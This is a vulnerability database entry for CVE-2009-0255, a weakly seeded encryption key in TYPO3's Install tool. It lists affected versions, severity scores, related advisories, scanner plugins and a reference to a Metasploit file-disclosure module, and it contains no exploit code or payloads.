ID CVE-2009-0255
Summary The System extension Install tool in TYPO3 4.0.0 through 4.0.9, 4.1.0 through 4.1.7, and 4.2.0 through 4.2.3 creates the encryption key with an insufficiently random seed, which makes it easier for attackers to crack the key.
References
Vulnerable Configurations
  • TYPO3 4.0
    cpe:2.3:a:typo3:typo3:4.0
  • TYPO3 4.0.1
    cpe:2.3:a:typo3:typo3:4.0.1
  • TYPO3 4.0.2
    cpe:2.3:a:typo3:typo3:4.0.2
  • TYPO3 4.0.3
    cpe:2.3:a:typo3:typo3:4.0.3
  • TYPO3 4.0.4
    cpe:2.3:a:typo3:typo3:4.0.4
  • TYPO3 4.0.5
    cpe:2.3:a:typo3:typo3:4.0.5
  • TYPO3 4.0.6
    cpe:2.3:a:typo3:typo3:4.0.6
  • TYPO3 4.0.7
    cpe:2.3:a:typo3:typo3:4.0.7
  • TYPO3 4.0.8
    cpe:2.3:a:typo3:typo3:4.0.8
  • TYPO3 4.0.9
    cpe:2.3:a:typo3:typo3:4.0.9
  • TYPO3 4.1.0
    cpe:2.3:a:typo3:typo3:4.1.0
  • cpe:2.3:a:typo3:typo3:4.1.0:rc1
    cpe:2.3:a:typo3:typo3:4.1.0:rc1
  • cpe:2.3:a:typo3:typo3:4.1.0:beta1
    cpe:2.3:a:typo3:typo3:4.1.0:beta1
  • TYPO3 4.1.1
    cpe:2.3:a:typo3:typo3:4.1.1
  • TYPO3 4.1.2
    cpe:2.3:a:typo3:typo3:4.1.2
  • TYPO3 4.1.3
    cpe:2.3:a:typo3:typo3:4.1.3
  • TYPO3 4.1.4
    cpe:2.3:a:typo3:typo3:4.1.4
  • TYPO3 4.1.5
    cpe:2.3:a:typo3:typo3:4.1.5
  • TYPO3 4.1.6
    cpe:2.3:a:typo3:typo3:4.1.6
  • TYPO3 4.1.7
    cpe:2.3:a:typo3:typo3:4.1.7
  • TYPO3 4.2.0
    cpe:2.3:a:typo3:typo3:4.2.0
  • TYPO3 4.2.1
    cpe:2.3:a:typo3:typo3:4.2.1
  • TYPO3 4.2.2
    cpe:2.3:a:typo3:typo3:4.2.2
  • TYPO3 4.2.3
    cpe:2.3:a:typo3:typo3:4.2.3
CVSS
Base: 5.0 (as of 23-01-2009 - 13:08)
Impact:
Exploitability:
CWE CWE-310
CAPEC
  • Signature Spoofing by Key Recreation
    An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.
Access
VectorComplexityAuthentication
NETWORK LOW NONE
Impact
ConfidentialityIntegrityAvailability
PARTIAL NONE NONE
metasploit via4
description This module exploits a flaw in TYPO3 encryption ey creation process to allow for file disclosure in the jumpUrl mechanism. This flaw can be used to read any file that the web server user account has access to view.
id MSF:AUXILIARY/ADMIN/HTTP/TYPO3_SA_2009_001
last seen 2019-03-23
modified 2018-07-12
published 2011-11-07
reliability Normal
reporter Rapid7
source https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/http/typo3_sa_2009_001.rb
title TYPO3 sa-2009-001 Weak Encryption Key File Disclosure
nessus via4
  • NASL family FreeBSD Local Security Checks
    NASL id FREEBSD_PKG_653606E9F6AC11DD94D90030843D3802.NASL
    description Secunia reports : Some vulnerabilities have been reported in Typo3, which can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting and session fixation attacks, and compromise a vulnerable system. The 'Install tool' system extension uses insufficiently random entropy sources to generate an encryption key, resulting in weak security. The authentication library does not properly invalidate supplied session tokens, which can be exploited to hijack a user's session. Certain unspecified input passed to the 'Indexed Search Engine' system extension is not properly sanitised before being used to invoke commands. This can be exploited to inject and execute arbitrary shell commands. Input passed via the name and content of files to the 'Indexed Search Engine' system extension is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Certain unspecified input passed to the Workspace module is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Note: It is also reported that certain unspecified input passed to test scripts of the 'ADOdb' system extension is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected website.
    last seen 2019-02-21
    modified 2018-12-19
    plugin id 35624
    published 2009-02-09
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=35624
    title FreeBSD : typo3 -- multiple vulnerabilities (653606e9-f6ac-11dd-94d9-0030843d3802)
  • NASL family Debian Local Security Checks
    NASL id DEBIAN_DSA-1711.NASL
    description Several remotely exploitable vulnerabilities have been discovered in the TYPO3 web content management framework. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2009-0255 Chris John Riley discovered that the TYPO3-wide used encryption key is generated with an insufficiently random seed resulting in low entropy which makes it easier for attackers to crack this key. - CVE-2009-0256 Marcus Krause discovered that TYPO3 is not invalidating a supplied session on authentication which allows an attacker to take over a victims session via a session fixation attack. - CVE-2009-0257 Multiple cross-site scripting vulnerabilities allow remote attackers to inject arbitrary web script or HTML via various arguments and user-supplied strings used in the indexed search system extension, adodb extension test scripts or the workspace module. - CVE-2009-0258 Mads Olesen discovered a remote command injection vulnerability in the indexed search system extension which allows attackers to execute arbitrary code via a crafted file name which is passed unescaped to various system tools that extract file content for the indexing. Because of CVE-2009-0255, please make sure that besides installing this update, you also create a new encryption key after the installation.
    last seen 2019-02-21
    modified 2018-11-10
    plugin id 35463
    published 2009-01-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=35463
    title Debian DSA-1711-1 : typo3-src - several vulnerabilities
refmap via4
bid 33376
confirm http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/
debian DSA-1711
secunia
  • 33617
  • 33679
xf typo3-installtool-weak-security(48132)
Last major update 29-01-2009 - 00:00
Published 22-01-2009 - 18:30
Last modified 07-08-2017 - 21:33
Back to Top